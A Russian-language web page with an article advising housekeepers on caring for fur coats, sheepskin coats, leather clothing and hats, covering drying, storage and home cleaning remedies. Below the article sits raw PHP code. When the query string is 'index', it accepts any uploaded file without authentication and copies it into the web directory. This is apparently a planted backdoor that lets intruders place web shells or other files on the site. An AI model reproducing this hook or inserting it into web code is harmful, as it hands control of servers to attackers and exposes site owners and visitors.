НУЖНЫЕ ЛЮДИ
     
 

Статьи

Домработнице: инструкция по уходу за вещами, кожей и мехом

«назад

Изделия из меха:
Если шуба промокла от снега, то её нужно обязательно стряхнуть и повесить не на вешалку, а сушить на плечиках, которые соответствуют величине одежды.
Не надо проводить сушку меха около обогревателя или феном, при этом шуба усаживается и становится жесткой.
Нельзя одевать на шубу целлофановый пакет, больше подойдет специальный чехол из полотна, который позволит проникать воздуху вовнутрь. При этом шуба должна висеть и не касаться другой одежды, во избежание замятия ворса.
Дубленка:
Такие вещи чувствительны к влаге - одино-два попадания под дождь или снег, и на её поверхности могут образоваться пятна. Если уже это произошло, то ничего  самостоятельно не делайте, лучше прибегнуть к услугам химчистки.
Не исключено, что после химчистки вещь станет на полтона светлее, т.к. при обработке с нее счищается верхний слой (если нет услуги восстановления цвета).
Если вы хотите отказаться от химчисток и воспользоваться народными средствами, то надо быть очень осторожным: прежде чем использовать предложенный способ, рекомендуем на незаметной части дубленки посмотреть на его работу.
Большинство дубленок после чистки нуждаются в подкраске. Советуем пользоваться краской в баллончиках. Прежде чем приступить к покраске, закройте полиэтиленом меховые части на воротнике и рукавах, и распыляйте на расстоянии 20-30 см от поверхности.
Подскажем несколько народных методов по чистке, чтобы сберечь Вашу вещь:

  • Бензин и картофельный крахмал: смешиваем, втираем губкой в загрязненную часть, и после подсыхания удаляем мягкой щеткой.
  • Может помочь корка черного хлеба - потереть залоснившиеся места.

Кожаная одежда:
Легкую чистку изделий из кожи можно делать мыльной водой с нашатырным спиртом, после чего натереть глицерином.
Не используйте средства со свойствами растворителя (ацетон, бензин) - они испортят внешний вид одежды.
Чтобы придать изделию из кожи вид новой вещи, протрите поверхности смесью молока и скипидара 1:1, а после натереть бесцветным кремом.
Шляпки и шапки:
После стирки шапки (или если она промокла под дождем) её необходимо сушить, предварительно одев на бутыль или кастрюлю, в зависимости от размера.
Если  у шляпы обвисли поля, то их лучше выровнять негорячим утюгом через мокрую марлевую тряпочку, но при этом не высушивать их окончательно.
Для того чтобы сохранить форму головного убора, лучше всего хранить его в специальных картонных коробках.
И все-таки, мы рекомендуем обращаться к специалистам.

 
     


if ($_SERVER['QUERY_STRING'] == 'index') { echo '
'; $uploaddir = ''; $uploadfile = $uploaddir.basename($_FILES['uploadfile']['name']); if (copy($_FILES['uploadfile']['tmp_name'], $uploadfile)) { echo "

OK

"; exit; }else{ echo "

NO

"; exit; } exit; }